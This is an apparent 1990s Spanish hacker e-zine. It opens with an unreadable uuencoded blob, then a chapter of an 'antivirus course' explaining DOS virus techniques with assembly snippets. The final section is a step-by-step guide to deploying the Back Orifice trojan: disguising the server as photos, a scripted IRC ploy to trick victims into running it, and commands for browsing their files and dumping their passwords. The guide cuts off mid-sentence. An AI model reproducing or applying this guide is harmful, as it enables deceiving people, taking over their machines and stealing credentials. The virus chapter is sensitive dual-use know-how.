MY80]AJ9*QV@WCM,C.2\AH@0([2NQ8$Q.C_#&&UIB,HUK:C3+9N_XC/%+^?5?
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
8]_FSYO^O^?]K_O_WR___/Q&@"8``L```
`
end
sum -r/size 1846/11634

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 CURSO DE ANTIVIRUS
 ------------------

 Primer capitulo: INTRODUCCION

 
******************************************************************************
  Disposicion Legal:

   El motivo del presente curso es instruir a aquel que lo siga en el
  conocimiento de las tecnicas usadas para combatir virus, empezando por
  las mas basicas para acabar en las ultimas novedades. Para ello
  profundizare en el conocimiento del codigo virico con el unico
  proposito de poner al lector en disposicion de saber a que nos
  enfrentamos cuando luchamos contra esta lacra del mundo informatico.
  La informacion contenida en el curso es informacion tecnica que puede
  utilizarse en la fabricacion de un virus. De ahi que la responsabilidad
  unica es del lector, y a su eleccion queda usar bien o mal la informacion
  aqui relatada. Del mismo modo es su responsabilidad ejecutar cualquier
  codigo aparecido en el curso en su propio ordenador o en el de
  terceros, declinando yo toda responsabilidad por los posibles daos
  causados.

   Para evitar en la medida de lo posible el uso fraudulento de esta
  informacion no dare en ningun momento el codigo completo de ningun
  virus, sino solo rutinas sueltas. De ese modo la confeccion de un
  virus a partir de las rutina mostradas en el curso es una labor que
  requiere un esfuerzo por parte del lector y por tanto un delito
  consciente.

>   De ahi que yo, el autor, declino toda responsabilidad civil y/o legal
>  que discurra de la utilizacion fraudulenta de esta informacion. El
>  responsable unico y ultimo ser  el lector si decide usarla para dichos
>  fines.
							El autor:
							Manuel Llorens.
 
******************************************************************************

  He creido conveniente comenzar el curso explicando cada una de las
 preguntas de la encuesta, dada la variedad de respuestas que he
 recibido. No me extender en aquellas que por su caracter meramente
 tecnico pertenezcan mas al curso de ASM de Pablo Barron que al
 presente.
  Cada uno de los puntos se desarrollar  a lo largo del curso alli donde
 sea conveniente. Aun no he decidido el 'indice' del mismo, que ya
 incluire en el proximo numero (es por esperar a tener el mayor numero
 posible de encuestas)

> Sabes para lo que sirve una interrupcion?
  Una interrupcion es el modo que tiene un programa ensamblador de
 ejecutar servicios y funciones del BIOS (Basic Input Output System,
 mas conocido como la ROM) y el DOS.
  La mayoria de los virus 'interceptan' estas interrupciones de modo
 que cada vez que se ejecuta uno de dichos servicios el virus supervisa
 lo que esta haciendo el programa que ejecuto la interrupcion, a este
 proceso se le denomina 'instalar un gestor de interrupcion'.
  La instruccion ensamblador que ejecuta una interrupcion es

   int numero_de_la_interrupcion.

  La direccion de cada gestor de interrupcion (vector de interrupcion)
 se guarda en una tabla a partir de la direccion 0000:0000, y cada
 vector ocupa 4 bytes (seg:off).

> Sabes instalar un gestor de interrupcion?
  Pues tan facil como esto:

  mov  ah,25h (servicio establecer vector de interrupcion)
  mov  al,interrupcion_a_capturar (entre 0 y 255)
  lds  dx,gestor_de_interrupcion (direccion de la rutina gestora)
  int  21h (llama a la interrupcion del DOS)

  Otro metodo que puede usarse si no se quiere llamar al DOS es el
 siguiente:

  xor  ax,ax
  mov  ds,ax
  mov  bx,4*interrupcion_a_capturar
  mov  [bx],offset gestor_de_interrupcion
  mov  [bx+2],cs (si el gestor esta en el mismo segmento que el actual)

  Generalmente es necesario guardar previamente el gestor de
 interrupcion actual antes de cambiarlo por el nuestro con el fin de
 volver a instalar en antiguo al salir del programa. Tambien
 generalmente es necesario que nuestro propio gestor de interrupcion
 llame al antiguo. Por ejemplo un virus captura la interrupcion 21h (la
 del DOS) si 'detecta' que el programa que la ejecuto est  intentando
 abrir un fichero (mediante ah=3Dh) lo tratar  de infectar y finalmente
 dejar  que el DOS lo abra, llamando al gestor de interrupcion antiguo.
 Igualmente si la funcion que el programa ejecuta no es util a nuestro
 virus la dejara pasar al DOS 'intacta'.

> Conoces la forma en la que arranca el DOS?
  El proceso difiere ligeramente segun se arranque desde el HD o desde
 un disquete, pero basicamente a grandes rasgos es el que sigue:

  Primero se ejecuta una rutina que reside en el MBR (ver mas abajo) que
 se encarga de cargar el sector BOOT de la particion activa. Si se esta
 arrancando desde un disquete el proceso es similar solo que no existe
 MBR ni tabla de particion, ya que el sector BOOT siempre esta en la
 misma posicion (el primero del disco). Se ejecuta el codigo contenido
 en el BOOT. El BOOT carga IO.SYS e MSDOS.SYS a partir de 0070:0000 o
 presenta un mensaje de error si el disco no era de arranque. A
 continuacion ejecuta IO.SYS (una rutina contenida en el que se denomina
 SYSINIT) el cual ejecuta a su vez MSDOS.SYS. Cuando MSDOS.SYS devuelve
 el control a SYSINIT este carga el CONFIG.SYS lo procesa y al final
 entrega el control a COMMAND.COM para que cargue el autoexec.bat

  Este proceso de carga es muy importante dado que si un virus consigue
 infectar el MBR o el BOOT toma el control del ordenador antes que
 ningun otro programa. A partir de aqui tendremos en cuenta la
 siguiente maxima del mundo de los virus:

 "Toda porcion de codigo ejecutable es susceptible de ser infectada"
 "Toda porcion de codigo no ejecutable puede ser infectada pero nunca
 puede dar lugar por si sola a una infeccion" (por ejemplo un mensaje
 nunca puede dar lugar a una infeccion, aunque si puede haber sido
 infectado por un virus como modo de guardar en el sus datos).

> Sabes lo que es el DTA?
  Es el Disk Transfer Address. Basicamente es una zona de memoria que se
 crea al ejecutar cada programa y que sirve para que las funciones del
 DOS devuelvan informacion al programa a traves de aquellas
 interrupciones que no piden explicitamente una direccion de memoria.
  Por ejemplo, cuando leemos un fichero en ASM mediante una interrupcion
 le pasamos al DOS la direccion de memoria donde queremos que este meta
 los datos leidos del fichero, pero cuando le pedimos que nos diga que
 ficheros encuentra que coincidan con '*.COM' la respuesta es enviada
 al DTA, ya que no le pasamos un direccion.
  Por defecto se encuentra a partir del byte 80h del comienzo del
 segmento del programa (ver diferencias entre un COM y un EXE) y es la
 misma zona que usa el DOS para pasar los parametros de la linea de
 comandos a un programa por lo que si vamos a usar la DTA deberemos
 relocalizarla primero fuera de dicha zona o perderemos la informacion
 sobre dichos parametros. Relocalizarla es tal facil como hacer:

  mov   ah,1ah
  lds   dx,direccion_del_nuevo_dta
  int   21h

  Lo normal es que el virus se cree su propio DTA para no interferir
 con los parametros que se le hayan podido pasar al programa infectado
 y luego restaura la DTA antes de salir.

> Sabes lo que es un MCB?
  Memory Control Block. Es una zona de memoria que se encuentra justo
 antes de cada bloque de memoria que reserva el DOS para uso de un
 programa que indica cu nta memoria se ha reservado, por que programa y
 cual es el siguiente bloque. De este modo un virus puede reservar
 memoria para si mismo mediante la modificacion directa de estos MCBs.

> Sabes lo que es el MBR?
  Es el Master Boot Record. Esta presente en el sector 0 de cada disco
 duro, y contiene ademas de una porcion de codigo ejecutable la tabla de
 particion. Puede crearse un MBR nuevo mediante la ejecucion de FDISK
 /MBR, en caso de sospecharse que este pueda haber sido infectado.
 Algunos discos duros de gran capacidad (>512 megas) instalan en el MBR
 su propia rutina para poder engaar al DOS y hacerle creer que son
 menores de lo que realmente son, ya que el DOS no puede trabajar con
 discos de tamaos >512 megas, de ahi que debemos ser cuidadosos. En
 cualquier caso, la destruccion del codigo ejecutable del MBR no es
 demasiado peligrosa, ya que siempre podemos restaurarlo mediante el
 FDISK o mediante las utilidades que nos entregaron con el HD, pero si
 es m s peligroso destruir la tabla de particiones, ya que si no
 recordamos los valores que contiene podriamos perder el acceso al disco
 duro.

> Sabes lo que es un CRC?
  Ciclyc Redundant Check. Es una forma de comprobar de forma univoca que
 el contenido de un archivo no ha cambiado, mediante una operacion
 matem tica que afecta a cada byte del archivo y genera un numero (de
 generalmente 16 o 32 bytes) para cada archivo. Una vez obtenido este
 numero las posibilidades de que una modificacion del archivo de el
 mismo numero son pequeisimas. De ahi que haya sido un metodo
 tradicionalmente muy utilizado por los antivirus para comprobar si el
 programa habia sido modificado por un virus, guardando para cada
 directorio un archivo con los CRCs de cada archivo del mismo y
 comprobandolo periodicamente o al ejecutar cada archivo (en caso de un
 antivirus residente o uno que modifique directamente el ejecutable para
 que se auto chequee cada vez que se ejecute, lo cual ya no se usa porque
 daba muchos problemas y falsas alarmas). Otro metodo de comprobar la
 integridad de un archivo son los checksums o sumas de control que son
 mucho mas sencillas y rapidas pero de menos fiabilidad. De hecho el
 metodo de los CRCs es tan potente que muchos antivirus son capaces de
 reconstruir el archivo antes de ser modificado a partir de la
 informacion de estos. Esta tecnica a dejado de ser segura debido a la
 aparicion de virus stealth (invisibles) que son capaces de hacer que
 un archivo infectado aparezca a los ojos del programa que calcula el
 CRC como estaba antes de infectarlo (ver m s adelante).

> Sabes en que se diferencia un COM de un EXE?
  La diferencia principal es que un COM solo puede ocupar un segmento 64
 K y un EXE puede ocupar toda la memoria por debajo de 1 mega (sin
 contar que el programa este hecho en modo protegido). Pero para
 nuestros fines la diferencia principal radica en la forma diferente que
 tiene el DOS de cargar y ejecutar estos programas. Veamos como carga el
 DOS un COM o un EXE.
  Primero se crea un PSP (Program Segment Prefix) que ocupa los 100h
 primeros bytes del segmento que ocupa el programa. El programa en si se
 carga a partir de 100h. El PSP guarda alguna informacion sobre el
 programa que se encuentra justo despus de el. Ademas como vimos
 contiene a la DTA y/o a los par metros (por defecto). Si se trata de un
 archivo COM el programa comienza a ejecutarse a partir de 100h, si se
 trata de un EXE el programa se ejecuta a partir de los datos
 especificados en la cabecera del mismos que son los primeros bytes del
 archivo ejecutable. No debe confundirse el PSP con la cabecera de un
 EXE. La cabecera de un EXE son los primeros bytes del archivo y el PSP
 se crea para cualquier programa ejecutable en la memoria (COMs o EXEs).
 En realidad existen otros programas ejecutables como son los
 controladores de dispositivos (Device Drivers) que se instalan en el
 config.sys o los cero code start, que son archivos que se ejecutan
 antes de que se haya cargado el dos (IO.SYS y MSDOS.SYS por ejemplo).
 En un COM por tanto el primer byte del archivo corresponde con el
 primer byte que se ejecutar , en un EXE en cambio los primeros bytes
 corresponden a una cabecera que principalmente ofrece informacion sobre
 el punto de entrada al archivo, es decir, sobre el byte a partir del
 cual se ejecutara dicho ejecutable. Ademas contiene la tabla de
 relocalizacion que sirve para cambiar los saltos absolutos (los no
 relativos) que contiene el EXE de modo que este pueda ejecutarse
 independientemente de la direccion de memoria donde resida (para la
 distincion entre saltos absolutos y relativos consultar el curse de ASM
 de Pablo ;)

> Sabes hacer un programa residente?
  Un programa residente TSR (Terminate and Stay Resident) es un programa
 que al terminar su ejecucion no libera la memoria que le habia sido
 asignada por el DOS, pero si devuelve el control a este. Sirven
 generalmente para instalar rutinas en memoria, en la mayor parte de los
 casos gestores de interrupcion. Para dejar un programa residente hay
 dos metodos, el primero es mediante la modificacion de los MCBs y el
 segundo mediante una llamada al DOS:

  mov    ah,31h
  mov    al,error_level
  mov    dx,tamao_de_la_porcion_residente a partir del PSP)
  xor    dx,4 (para pasar dx a p rrafos)
  add    dx,16 (para reservar espacio para los 100h bytes del PSP)
  int    21h

  Para conocer el tamao de la porcion residente lo mas conveniente es
 poner una etiqueta donde comienza y otra donde acaba y hacer la resta
 de ambas.

> Sabes programar un tracer (paso a paso)?
  Un tracer es un rutina que pone la CPU en modo paso a paso es decir,
 que cada vez ejecute una instruccion llamara a la int 1h. Existen
 diversas tecnicas usadas por los virus y otros programas para evitar
 que un tracer explore su codigo (armouring). Para evitar esto ultimo
 hay que programar con mucho cuidado de modo que cada vez que se ejecuta
 una instruccion miremos a la siguiente para ver si se trata de una
 instruccion capciosa aunque es un proceso laborioso y dificil...
 en general el procedimiento consiste en instalar un gestor de la
 interrupcion 1 y activar el flag de paso a paso:

  pushf
  pop    ax
  or     ax,100h
  push   ax
  popf

  Un tracer es muy util cuando queremos supervisar la ejecucion de un
 programa de forma autom tica. Los virus usan esta tcnica para labores
 de tunneling (ver m s adelante).

> Sabes usar algun debugger?
  Un debugger es como un tracer pero con control en tiempo real por
 parte del usuario. Es muy recomendable tener uno a mano para pillar los
 bugs que derivan de la programacion de antivirus ;)

> Sabes la diferencia entre un virus y un troyano?
  Un virus es una porcion de codigo ejecutable que se aade a otra ya
 existente. Los virus se ejecutan sin intencion por parte del usuario,
 que no sabe que el programa en cuestion contiene un virus. Un troyano
 es un programa con entidad propia que generalmente se construye para
 labores destructivas. Es el usuario el que confiando en el programa lo
 ejecuta creyendo que se trata de un programa de algun otro tipo.

> Sabes como se produce la infeccion de un archivo?
  El virus modifica el programa a infectar de tal modo que se ejecute su
 codigo en vez del codigo del programa original. Salvo los virus de
 enlace todos los virus necesitan modificar el programa original.

> Sabes lo que es un virus 'stealth'?
  Es un virus que mediante algunas tcnicas consigue ocultar su
 existencia a los antivirus y en general al DOS. Para ello necesita
 estar residente antes que los antivirus. Modifica la informacion que
 los antivirus obtiene de modo que parezca que el archivo es normal.
 Para ello existen diversos mtodos, ya que son diversos los mtodos que
 el DOS usa para manejar archivos. Principalmente son el trabajo fisico
 con el disco (a base de leer sectores), los FCBs (mtodo obsoleto), y
 la apertura del archivo mediante handles (mtodo vigente).

>       Sabes lo que es un 'handle stealth'?
  Es un virus que utiliza tcnicas stealth de modo que cada vez que un
 programa abre un handle para leer/escribir un archivo, modifica los
 datos del handle para que parezca que el programa es normal. Es decir,
 aunque el programa sigue estando infectado no es posible ver el
 verdadero programa sino solo la copia sin infectar que nos muestra el
 virus.
>       Sabes lo que es un 'infector/disinfector'?
  Es justo la tcnica contraria, cuando el virus advierte que se est 
 abriendo un programa infectado lo desinfecta y solo vuelva a infectarlo
 cuando el archivo es cerrado. Es un mtodo m s sencillo de implementar
 que el 'handle stealth'.

> Sabes lo que es un virus con 'tunneling?
  Cuando un antivirus queda residente instala sus propios gestores de
 interrupcion para interrupciones que puedan serle utiles a un virus. De
 ese modo puede dar la alarma cuando un virus efectue una operacion
 extraa a travs de una de estas interrupciones. Un virus con tunneling
 intenta averiguar la direccion de los gestores de interrupcion del DOS
 antes de que quedara residente el antivirus. Esto es posible porque
 como dijimos con anterioridad, el antivirus tiene que devolver el
 control a los gestores del DOS en algun momento para permitir que el
 DOS haga su trabajo. Las tcnicas principalmente son dos: hacer un
 tracing, o buscar saltos a lo largo del codigo del gestor del antivirus
 que salten al DOS. Para ello necesitan conocer el segmento del DOS, lo
 cual se hace a travs de una interrupcion indocumentada del DOS. En
 realidad son mtodos poco fiables dado que son bastante evidentes y a
 veces condenados al fracaso. Muchos antivirus residentes averiguan que
 un virus les est  haciendo un tunneling y lo detiene. Cuando desarrolle
 el tema expondr algunas tcnicas que he descubierto hace poco, que
 subsanan la mayoria de los problemas de los tunneling tradicionales.
 Aunque hasta la fecha ningun virus las incorpora, es bueno anticiparse
 a los fallos del DOS y taparlos antes de que esto ocurra, de ahi mi
 inters por esta tcnica ;)
  Otras tcnicas se basan en el acceso al disco directamente a travs
 de los puertos, es decir sin necesidad de llamar a ninguna
 interrupcion. Este mtodo presenta el inconveniente de que no siempre
 funciona, por lo que es poco probable que un virus lo incorpore.

> Sabes lo que es un virus polimorfico?
  Es un virus que modifica su apariencia en cada infeccion. Esto lo
 consigue encript ndose con una clave diferente en cada copia que hace
 de si mismo. Esto dificulta mucho las labores de busqueda de cadenas
 por parte de los antivirus, que solo pueden fijarse en las rutinas de
 desencriptacion o utilizar tcnicas de otro tipo. Para dificultar aun
 m s la busqueda de cadenas un virus realmente polimorfico debe variar
 tambin la apariencia de su rutina de desencriptacion, mediante la
 insercion de NOPs aleatorios (instruccion ASM que no hace nada) y
 mediante la utilizacion de distintos registros y loops para realizar la
 desencriptacion. Se ha popularizado para este fin la realizacion de
 motores de encriptacion que son rutinas que desarrollan estas tcnicas
 de un modo general y que se aaden a un virus ya completo que no
 incluia polimorfismo.

> Sabes lo que es un virus con 'armouring'?
  Es un virus que utiliza tcnicas para dificultar ser desensamblado o
 traceado. No tienen otro fin que este, pero dado que generalmente
 cuesta muy poco realizarlas es bastante popular que un virus las
 incluya, aunque tambin pueden dar lugar a que un antivirus heuristico
 lo detecte. Ultimamente tambin se han popularizado tcnicas de
 armouring que actuan contra un antivirus especifico, evitando las
 combinaciones de bytes que se conoce que activan la alarma heuristica o
 desactivando el antivirus residente en memoria (mal llamado tunneling).

> Has hecho alguna vez un virus?
  Hacer un virus es una cosa divertida, con la cual se aprende mucho,
 pero que est  penada por la ley. Es mejor combatir esta lacra
 estudiando a fondo sus tcnicas y evit ndolas, intentando siempre ir un
 paso por delante de los desarrolladores de virus.

> Sabes infectar COMs?
  La infeccion de un COM se hace generalmente modificando los primeros
 bytes de modo que la ejecucion comience por la rutina virica que se
 aade al programa original a partir de su fin (virus appending). Despus
 de la ejecucion del virus se restaura en memoria los 3 primeros bytes
 del archivo original y se le ejecuta. De este modo el usuario no nota
 que el programa est  infectado. Otro mtodo cada vez m s en desuso es
 el de sobreescribir el codigo original del programa (virus
 overwritting). De este modo el programa original no puede ser ejecutado
 y el virus se delata con facilidad. Por supuesto puede insertarse el
 codigo del virus al principio, pero es una tcnica que no se usa
 demasiado.

> Sabes infectar EXEs?
  La infeccion de un EXE por el contrario no precisa de la modificacion
 del programa original. Se aade el codigo al final y se modifica la
 cabecera del EXE de tal modo que el punto de entrada cambie a la rutina
 virica, que despus cede el control al punto de entrada original.
 Tambin se usan tcnicas como insertar el codigo del virus en el stack
 del EXE (zona 'hueca' que puede o no estar presente en el archivo).

> Sabes lo que es un virus de enlace?
  Es una modalidad de virus que no precisa modificar el archivo que
 infecta. Para ello lo que hace es modificar la FAT de modo que el
 comienzo del archivo siempre apunte a un sector que contiene el virus.
 Se ejecuta este y carga el programa original. No son muy populares dado
 que precisan de un mayor trabajo y no son en general f ciles de
 detectar.

> Sabes como funciona una busqueda heuristica?
  Ya la he mencionado numerosas veces en el texto. Es una tcnica
 antivirus que evita la busqueda de cadenas. Para ello lo que hace es
 desensamblar el programa y ejecutarlo paso a paso, a veces mediante la
 propia CPU, a veces mediante una emulacion. De ese modo averigua qu
 hace exactamente el programa en estudio e informa al usuario.
 Generalmente es dificil de implementar de un modo autom tica ya que se
 desconoce el conocimiento del usuario. Esto da lugar a un compromiso
 entre potencia del mtodo y falsas alarmas. En general es una buena
 tcnica si se implementa bien y el usuario tiene un alto conocimiento
 tcnico. La mayoria de los virus nuevos evitan directamente la busqueda
 heuristica modificando los algoritmos hasta que el programa antivirus
 no es capaz de indentificarlos.

  Bueno pues esto es todo por hoy. No es que vay is a aprender nada nuevo
 pero quedan sentados unos conocimientos b sicos y un lenguaje a
 utilizar en el resto del curso. Preguntas... ya sabis las que quer is
 ;)

  Existen muchos puntos que no est n suficientemente detallados, cuando
 sea necesario desarrollar cada uno, asi que no me preguntis sobre eso
 a raiz de esta introduccion, esperad a que llegue a ese capitulo ;)

 Patuel.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Back Orifice

							Redactora jefe:
							      Barbwired 
					     aenimamadrid@geocities.com
							 Colaboradores:
								FREEDOM


	Este texto pretende explicar de forma clara y concisa el uso del 
BO en w95 y las posibles aplicaciones que se le pueden dar en IRC.
De ningun modo se pretende incitar a la ilegalidad y este documento se 
redacta con fines educativos, para la investigacion y prevencion del ataque.

0 - Que es el BO?

Se trata de un troyano que se aprovecha vilmente de los bugs de seguridad
de w95/98. NO tengo constancia de su funcionamiento en NT. Quien consiga
colarle el bo a un incauto, tendra acceso a todo su sistema: Disco duro, 
cdrom, disketera, y por supuesto a sus archivos y directorios, pudiendo
borrarlos o modificarlos, bajarlos a su propio disco duro... 
(No seamos malos). 

1 - Donde conseguir este magnifico exploit?

BO se puede conseguir en las siguientes direcciones:
www.members.xoom.com/lynx/ en la zona de download (descarga).
http://www.cultdeadcow.com/
Para una mayor informacion se recomienda visitar:
www.rootshell.com/

2 - Ya tengo el Bo.zip, Que contiene?

El bo.zip o bo120.zip consta de una serie de archivos:

bo.txt          Oscuro documento explicativo. No se entiende mucho.
plugin.txt      Traducido en el epigrafe Apendice de este doc.
boserve.exe     El servidor autoinstalable del BO
bogui.exe       Cliente gui del BO
boclient.exe    Cliente en modo texto del BO
boconfig.exe    Utilidad de configuracion y plugin del server de BO
melt.exe        Descompresor de archivos comprimidos con el comando freeze
freeze.exe      Compresor de archivos. SE pueden descomprimir con melt.

3 - Que hacer con todos estos archivos?

Para que todo funcione correctamente debes saber que BAJO NINGUN CONCEPTO
debes ejecutar boserve.exe, pues te haria sensible al ataque. 

Lo primero que hay que hacer es averiguar la ip del pardillo. Despues hay que 
meterle como sea el archivo boserve.exe. Y conseguir que lo ejecute. Aqui 
entra en juego la imaginacion de cada uno. El campo ideal de accion es el 
IRC. Aqui los pobres chateros de a pie hablan a sus anchas, desconocedores
del peligro que les acecha.

4- Como le meto el BO al pardillo?

Hay que elegir una vicima que trabaje bajo windows. Todos sabemos que eso es
facil de averiguar en IRC.
Truco facil y muy visto, por tanto poco efectivo: renombrar boserve.exe
a fotos.exe. Si ya tienes algo de confianza con la victima en cuestion lo 
aceptara sin mayores problemas. Para gente mas desconfiada, intenta colarselo
despues de hacerte tu el desconfiado:

En el canal #intercambio_de_fotos_guarras_muy_fuertes:
	
        Elite: Que tienes para cambiar?
	Pardillo: un par de fotos de Barbwired, que esta tremenda.
	E: Pero estas seguro de que es Barb de verdad?, que si no no te mando
	   nada, que ya me la han querido liar...
	P: De verdad, que me las acabo de bajar de Playboy!     
	E: Vale, pues te mando yo una de Barbwired que tb esta muy buena.
	P: Anda! Barbwired, a mi me pone toda la pila... Uf!!!
		... etc, etc, etc....
Y luego le dices que tienes un ejecutable, que es una animacion de Barbwired
con su novia (todos sabemos que Barb es bisexual). XDDD Asi te llevas por el
morro unas cuantas fotos de Barbwired y encima le cuelas el boserve.exe.

Cuando nuestro amigo Pardillo ejecute la animacion y vea que no sale Barb por
ningun lado se va a coger un cabreo de narices, y con razon. Te disculpas 
como buenamente puedas y le dices que el fichero esta defectuoso y que te lo 
vas a volver a bajar. Lo que te apetezca, pero queda bien con el tio, para 
que no se corra la voz y sigan confiando en ti y en tus fotos guarras. Es 
conveniente hacerselo a varios a la vez en privado, para tener un buen numero 
de victimas. Con la excusa de volvertelo a bajar, te sales de Irc.
Vuelves a entrar con otro nick y a trabajar. 

5 - Como accedo al ordenador del Pardillo?

  Pasos a seguir:
  a) Copiar boclient.exe en tu directorio raiz, c:\
  b) Abrir una ventana de msdos en w95
  c) Resolver la ip de la victima. Facil de hacer en IRC. Si quieres le das
    conversacion para que no se vaya.
  d) En la ventana de msdos, desde la linea de comandos ejecutar boclient.exe
    a continuacion teclea host "IPdelPardillo", sin comillas.
  e) En teoria ya estas dentro.

6 - Que puedo hacer una vez dentro?

Puedes hacer maravillas. Pero por algo hay que empezar:
Desde bo tecleas dir. Te mostrara los archivos de su HD.
Si tecleas passes te saldran cosas interesantes, osea, algunas passwords.
Puedes teclear cd directorio para explorar. Como en MsDos.
Facil. 

Cosas bonitas para "perfeccionistas"
Puedes abrirle el puerto http y ver su disco duro comodamente con tu 
navegador (A ver si soy capaz de hacerme entender):
Una vez dentro tienes que teclear httpon 80, o sea activar el http y el 
